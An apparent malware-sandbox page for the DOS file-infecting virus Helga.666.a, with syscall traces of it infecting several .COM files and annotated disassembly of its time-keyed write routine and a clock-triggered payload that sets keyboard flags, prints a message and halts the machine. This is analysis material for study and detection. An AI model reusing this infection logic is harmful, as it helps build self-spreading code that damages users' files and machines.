Sample viewer

vx.netlux.org/Virus.DOS.Helga.666.a


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:53.897928579Z 26 PC: 12b04 | Set disk transfer address
2018-12-17T23:10:53.899093301Z 78 PC: 12b17 | Find first file
2018-12-17T23:10:53.904066886Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:53.905330189Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:53.909743493Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:53.932224304Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:10:53.939878325Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:53.941600281Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:53.958273809Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:53.960518739Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Window at the return from INT 21h "Get time" (its first instruction, 0x12ace: xor cx, dx, is fused onto the log line above).
; Per the DOS Get Time convention CX/DX hold the clock fields on return, so the byte stored below is time-derived.
0x12ad0: xor ch, cl                        ; fold the mixed clock bytes into CH
0x12ad2: mov byte ptr [di + 0x10], ch      ; save that byte at [di+0x10]; presumably a per-write key/seed (confirm against the call target)
0x12ad5: call 0x22aae                      ; NOTE(review): printed target lies outside this 0x12xxx range; with 16-bit IP wraparound it would be 0x12aae (confirm)
0x12ad8: pop bx                            ; stack cleanup/restore; the matching pushes are outside this window
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]         ; DOS function number is read from data, not an immediate; the trace logs this call as op 64 (Write)
0x12add: mov cx, 0x29a                     ; CX = 0x29a = 666 bytes, the length the trace reports for this write
0x12ae0: nop
0x12ae1: mov dx, di                        ; DX = DI: the buffer written starts at DI
0x12ae3: int 0x21                          ; logged in the trace with PC 12ae5 (the return address)
0x12ae5: pushaw                            ; save registers around the second call
0x12ae6: call 0x22aae                      ; same target as at 0x12ad5; calling it before and after the write looks like transform-then-restore (unconfirmed)
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret                               ; end of this routine
0x12aec: xchg si, di                       ; follows the ret, so it is not fall-through from the routine above
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:53.964064779Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:53.975256423Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:53.977894824Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:53.987379127Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:53.990098332Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.006230668Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.017632812Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.0207718Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.022885723Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.029906708Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.04973411Z 61 PC: 12cb1 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:10:54.058615858Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.060713311Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.068471232Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.082403851Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Window at the return from INT 21h "Get time" (its first instruction, 0x12ace: xor cx, dx, is fused onto the log line above).
; Per the DOS Get Time convention CX/DX hold the clock fields on return, so the byte stored below is time-derived.
0x12ad0: xor ch, cl                        ; fold the mixed clock bytes into CH
0x12ad2: mov byte ptr [di + 0x10], ch      ; save that byte at [di+0x10]; presumably a per-write key/seed (confirm against the call target)
0x12ad5: call 0x22aae                      ; NOTE(review): printed target lies outside this 0x12xxx range; with 16-bit IP wraparound it would be 0x12aae (confirm)
0x12ad8: pop bx                            ; stack cleanup/restore; the matching pushes are outside this window
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]         ; DOS function number is read from data, not an immediate; the trace logs this call as op 64 (Write)
0x12add: mov cx, 0x29a                     ; CX = 0x29a = 666 bytes, the length the trace reports for this write
0x12ae0: nop
0x12ae1: mov dx, di                        ; DX = DI: the buffer written starts at DI
0x12ae3: int 0x21                          ; logged in the trace with PC 12ae5 (the return address)
0x12ae5: pushaw                            ; save registers around the second call
0x12ae6: call 0x22aae                      ; same target as at 0x12ad5; calling it before and after the write looks like transform-then-restore (unconfirmed)
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret                               ; end of this routine
0x12aec: xchg si, di                       ; follows the ret, so it is not fall-through from the routine above
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.086660804Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.096422729Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.099294877Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.107006573Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.109215961Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.119220691Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.130485639Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.133888114Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.136165702Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.143867339Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.151251675Z 61 PC: 12cb1 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:10:54.159836676Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.161925284Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.175579321Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.177526943Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Window at the return from INT 21h "Get time" (its first instruction, 0x12ace: xor cx, dx, is fused onto the log line above).
; Per the DOS Get Time convention CX/DX hold the clock fields on return, so the byte stored below is time-derived.
0x12ad0: xor ch, cl                        ; fold the mixed clock bytes into CH
0x12ad2: mov byte ptr [di + 0x10], ch      ; save that byte at [di+0x10]; presumably a per-write key/seed (confirm against the call target)
0x12ad5: call 0x22aae                      ; NOTE(review): printed target lies outside this 0x12xxx range; with 16-bit IP wraparound it would be 0x12aae (confirm)
0x12ad8: pop bx                            ; stack cleanup/restore; the matching pushes are outside this window
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]         ; DOS function number is read from data, not an immediate; the trace logs this call as op 64 (Write)
0x12add: mov cx, 0x29a                     ; CX = 0x29a = 666 bytes, the length the trace reports for this write
0x12ae0: nop
0x12ae1: mov dx, di                        ; DX = DI: the buffer written starts at DI
0x12ae3: int 0x21                          ; logged in the trace with PC 12ae5 (the return address)
0x12ae5: pushaw                            ; save registers around the second call
0x12ae6: call 0x22aae                      ; same target as at 0x12ad5; calling it before and after the write looks like transform-then-restore (unconfirmed)
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret                               ; end of this routine
0x12aec: xchg si, di                       ; follows the ret, so it is not fall-through from the routine above
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.181063217Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.190337392Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.192191137Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.200215307Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.202065007Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.210963602Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.224878782Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.227877211Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.229196084Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.237097941Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.248080096Z 61 PC: 12cb1 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:10:54.256806386Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.259742942Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.268247839Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.269870959Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Window at the return from INT 21h "Get time" (its first instruction, 0x12ace: xor cx, dx, is fused onto the log line above).
; Per the DOS Get Time convention CX/DX hold the clock fields on return, so the byte stored below is time-derived.
0x12ad0: xor ch, cl                        ; fold the mixed clock bytes into CH
0x12ad2: mov byte ptr [di + 0x10], ch      ; save that byte at [di+0x10]; presumably a per-write key/seed (confirm against the call target)
0x12ad5: call 0x22aae                      ; NOTE(review): printed target lies outside this 0x12xxx range; with 16-bit IP wraparound it would be 0x12aae (confirm)
0x12ad8: pop bx                            ; stack cleanup/restore; the matching pushes are outside this window
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]         ; DOS function number is read from data, not an immediate; the trace logs this call as op 64 (Write)
0x12add: mov cx, 0x29a                     ; CX = 0x29a = 666 bytes, the length the trace reports for this write
0x12ae0: nop
0x12ae1: mov dx, di                        ; DX = DI: the buffer written starts at DI
0x12ae3: int 0x21                          ; logged in the trace with PC 12ae5 (the return address)
0x12ae5: pushaw                            ; save registers around the second call
0x12ae6: call 0x22aae                      ; same target as at 0x12ad5; calling it before and after the write looks like transform-then-restore (unconfirmed)
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret                               ; end of this routine
0x12aec: xchg si, di                       ; follows the ret, so it is not fall-through from the routine above
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.272653214Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.282648544Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.284309807Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.291565049Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.293928853Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.302806031Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.313774898Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.317060825Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.318235371Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.324416213Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.335945776Z 61 PC: 12cb1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:10:54.349869345Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.351334537Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.358776604Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.360273532Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Window at the return from INT 21h "Get time" (its first instruction, 0x12ace: xor cx, dx, is fused onto the log line above).
; Per the DOS Get Time convention CX/DX hold the clock fields on return, so the byte stored below is time-derived.
0x12ad0: xor ch, cl                        ; fold the mixed clock bytes into CH
0x12ad2: mov byte ptr [di + 0x10], ch      ; save that byte at [di+0x10]; presumably a per-write key/seed (confirm against the call target)
0x12ad5: call 0x22aae                      ; NOTE(review): printed target lies outside this 0x12xxx range; with 16-bit IP wraparound it would be 0x12aae (confirm)
0x12ad8: pop bx                            ; stack cleanup/restore; the matching pushes are outside this window
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]         ; DOS function number is read from data, not an immediate; the trace logs this call as op 64 (Write)
0x12add: mov cx, 0x29a                     ; CX = 0x29a = 666 bytes, the length the trace reports for this write
0x12ae0: nop
0x12ae1: mov dx, di                        ; DX = DI: the buffer written starts at DI
0x12ae3: int 0x21                          ; logged in the trace with PC 12ae5 (the return address)
0x12ae5: pushaw                            ; save registers around the second call
0x12ae6: call 0x22aae                      ; same target as at 0x12ad5; calling it before and after the write looks like transform-then-restore (unconfirmed)
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret                               ; end of this routine
0x12aec: xchg si, di                       ; follows the ret, so it is not fall-through from the routine above
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.362930744Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.372838391Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.374339468Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.381546305Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.383486797Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.392448186Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.403908302Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.408830513Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.410361759Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.416990963Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.428751334Z 61 PC: 12cb1 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:10:54.437203923Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.439060283Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.446634991Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.44935034Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Window at the return from INT 21h "Get time" (its first instruction, 0x12ace: xor cx, dx, is fused onto the log line above).
; Per the DOS Get Time convention CX/DX hold the clock fields on return, so the byte stored below is time-derived.
0x12ad0: xor ch, cl                        ; fold the mixed clock bytes into CH
0x12ad2: mov byte ptr [di + 0x10], ch      ; save that byte at [di+0x10]; presumably a per-write key/seed (confirm against the call target)
0x12ad5: call 0x22aae                      ; NOTE(review): printed target lies outside this 0x12xxx range; with 16-bit IP wraparound it would be 0x12aae (confirm)
0x12ad8: pop bx                            ; stack cleanup/restore; the matching pushes are outside this window
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]         ; DOS function number is read from data, not an immediate; the trace logs this call as op 64 (Write)
0x12add: mov cx, 0x29a                     ; CX = 0x29a = 666 bytes, the length the trace reports for this write
0x12ae0: nop
0x12ae1: mov dx, di                        ; DX = DI: the buffer written starts at DI
0x12ae3: int 0x21                          ; logged in the trace with PC 12ae5 (the return address)
0x12ae5: pushaw                            ; save registers around the second call
0x12ae6: call 0x22aae                      ; same target as at 0x12ad5; calling it before and after the write looks like transform-then-restore (unconfirmed)
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret                               ; end of this routine
0x12aec: xchg si, di                       ; follows the ret, so it is not fall-through from the routine above
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.453106168Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.463827862Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.478268938Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.486357907Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.489121877Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.499563904Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.51071262Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.514052245Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.516502793Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.523275971Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.534408509Z 61 PC: 12cb1 | Open file (Filename = 'PAH.COM')
2018-12-17T23:10:54.542621378Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.544286864Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.552367349Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.555065676Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Window at the return from INT 21h "Get time" (its first instruction, 0x12ace: xor cx, dx, is fused onto the log line above).
; Per the DOS Get Time convention CX/DX hold the clock fields on return, so the byte stored below is time-derived.
0x12ad0: xor ch, cl                        ; fold the mixed clock bytes into CH
0x12ad2: mov byte ptr [di + 0x10], ch      ; save that byte at [di+0x10]; presumably a per-write key/seed (confirm against the call target)
0x12ad5: call 0x22aae                      ; NOTE(review): printed target lies outside this 0x12xxx range; with 16-bit IP wraparound it would be 0x12aae (confirm)
0x12ad8: pop bx                            ; stack cleanup/restore; the matching pushes are outside this window
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]         ; DOS function number is read from data, not an immediate; the trace logs this call as op 64 (Write)
0x12add: mov cx, 0x29a                     ; CX = 0x29a = 666 bytes, the length the trace reports for this write
0x12ae0: nop
0x12ae1: mov dx, di                        ; DX = DI: the buffer written starts at DI
0x12ae3: int 0x21                          ; logged in the trace with PC 12ae5 (the return address)
0x12ae5: pushaw                            ; save registers around the second call
0x12ae6: call 0x22aae                      ; same target as at 0x12ad5; calling it before and after the write looks like transform-then-restore (unconfirmed)
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret                               ; end of this routine
0x12aec: xchg si, di                       ; follows the ret, so it is not fall-through from the routine above
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.558692774Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.568300636Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.570286224Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.578950365Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.581033929Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.590000581Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.602193815Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.60519449Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.607006096Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.61420035Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.625729161Z 61 PC: 12cb1 | Open file (Filename = 'TEST.COM')
2018-12-17T23:10:54.633186989Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.63520546Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.639924228Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.641192491Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.646343128Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.65716844Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.659781085Z 78 PC: 12c66 | Find first file
2018-12-17T23:10:54.664676451Z 78 PC: 12c66 | Find first file
2018-12-17T23:10:54.676552161Z 78 PC: 12bf7 | Find first file
2018-12-17T23:10:54.688660852Z 44 PC: 12d19 | Get time 0x12d19: cmp ch, cl
; Window at the return from INT 21h "Get time" (its first instruction, 0x12d19: cmp ch, cl, is fused onto the log line above).
; Per the DOS Get Time convention CH = hour and CL = minute, so the je below appears to gate the payload on hour == minute
; (register values are not shown; confirm). In this run the next logged call is at PC 12b36, so the payload path was evidently not taken.
0x12d1b: je 0x12d1e                        ; equal -> payload path
0x12d1d: ret                               ; otherwise return quietly
0x12d1e: push ds
0x12d1f: xor ax, ax
0x12d21: mov ds, ax                        ; DS = 0 to address low memory
0x12d23: mov byte ptr [0x417], 0x70        ; 0000:0417 is the BIOS keyboard-flags byte; 0x70 sets the Scroll/Num/Caps Lock state bits
0x12d28: mov ah, 1
0x12d2a: int 0x16                          ; BIOS keyboard status check; presumably makes the BIOS apply the new lock state (confirm)
0x12d2c: pop ds
0x12d2d: mov dx, di
0x12d2f: add dx, 0x218                     ; DX = DI + 0x218: address of the message text
0x12d33: mov ah, 9
0x12d35: int 0x21                          ; DOS display-string call; its return address is 0x12d37
0x12d37: cli
0x12d38: hlt                               ; halt with interrupts masked: the machine hangs until reset (or an NMI)
0x12d39: dec ax                            ; NOTE(review): nothing runs past the hlt; these look like data decoded as code.
0x12d3a: insb byte ptr es:[di], dx         ; The address gap 0x12d3c -> 0x12d3e implies a prefix byte, and the one-byte
0x12d3c: popaw                             ; opcodes 48 / 6C / 61 are ASCII 'H' / 'l' / 'a', consistent with the text "Helga" (unconfirmed).
0x12d3e: add word ptr [bx], di
2018-12-17T23:10:54.691478904Z 26 PC: 12b36 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17008,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:37.676640959Z 26 PC: 12b04 | Set disk transfer address
2018-12-25T12:54:37.679299015Z 78 PC: 12b17 | Find first file
2018-12-25T12:54:37.686772993Z 47 PC: 12b1d | Get disk transfer address
2018-12-25T12:54:37.688763263Z 67 PC: 12ca3 | Get or set file attributes
2018-12-25T12:54:37.695630877Z 67 PC: 12cab | Get or set file attributes
2018-12-25T12:54:37.714418256Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:37.731732204Z 87 PC: 12cb8 | Get or set file date and time
2018-12-25T12:54:37.735149409Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:37.751992726Z 66 PC: 12b79 | Move file pointer
2018-12-25T12:54:37.753788201Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Window at the return from INT 21h "Get time" (its first instruction, 0x12ace: xor cx, dx, is fused onto the log line above).
; Per the DOS Get Time convention CX/DX hold the clock fields on return, so the byte stored below is time-derived.
0x12ad0: xor ch, cl                        ; fold the mixed clock bytes into CH
0x12ad2: mov byte ptr [di + 0x10], ch      ; save that byte at [di+0x10]; presumably a per-write key/seed (confirm against the call target)
0x12ad5: call 0x22aae                      ; NOTE(review): printed target lies outside this 0x12xxx range; with 16-bit IP wraparound it would be 0x12aae (confirm)
0x12ad8: pop bx                            ; stack cleanup/restore; the matching pushes are outside this window
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]         ; DOS function number is read from data, not an immediate; the trace logs this call as op 64 (Write)
0x12add: mov cx, 0x29a                     ; CX = 0x29a = 666 bytes, the length the trace reports for this write
0x12ae0: nop
0x12ae1: mov dx, di                        ; DX = DI: the buffer written starts at DI
0x12ae3: int 0x21                          ; logged in the trace with PC 12ae5 (the return address)
0x12ae5: pushaw                            ; save registers around the second call
0x12ae6: call 0x22aae                      ; same target as at 0x12ad5; calling it before and after the write looks like transform-then-restore (unconfirmed)
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret                               ; end of this routine
0x12aec: xchg si, di                       ; follows the ret, so it is not fall-through from the routine above
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-25T12:54:37.756781142Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:54:37.77888076Z 66 PC: 12b97 | Move file pointer
2018-12-25T12:54:37.78832841Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:37.804577345Z 87 PC: 12bc0 | Get or set file date and time
2018-12-25T12:54:37.808319418Z 62 PC: 12bc6 | Close file
2018-12-25T12:54:37.826961596Z 67 PC: 12bcd | Get or set file attributes
2018-12-25T12:54:37.838095115Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:37.841436302Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:37.850266306Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:37.856645221Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:37.867595413Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:37.875613856Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:37.877497984Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:37.885626192Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:37.888240723Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:37.890977319Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:37.900567166Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:37.903495188Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:37.911096261Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:37.913262183Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:37.923361474Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:37.935498796Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:37.938568907Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:37.939828219Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:37.957352828Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:37.965253219Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:37.974124472Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:37.978148615Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:37.985514153Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:37.987100878Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:37.99064424Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.00042563Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.002361532Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.010986765Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.016387547Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.032716883Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.044747375Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.048105532Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.049874698Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.056842025Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.069165955Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.077770744Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.079788351Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.088621755Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.090685011Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.093872787Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.103180971Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.104527433Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.109812793Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.111936589Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.119287314Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.127708299Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.130817447Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.132350184Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.137169304Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.145833504Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.150921433Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.152391431Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.157640754Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.159909423Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.161905999Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.167691017Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.169711951Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.175144739Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.176532351Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.183624221Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.192199596Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.194524642Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.196127381Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.201079289Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.211036655Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.215797582Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.217146426Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.2219035Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.224116181Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.226075278Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.23319479Z 66 PC: 12b97 | Move file pointer (See above)
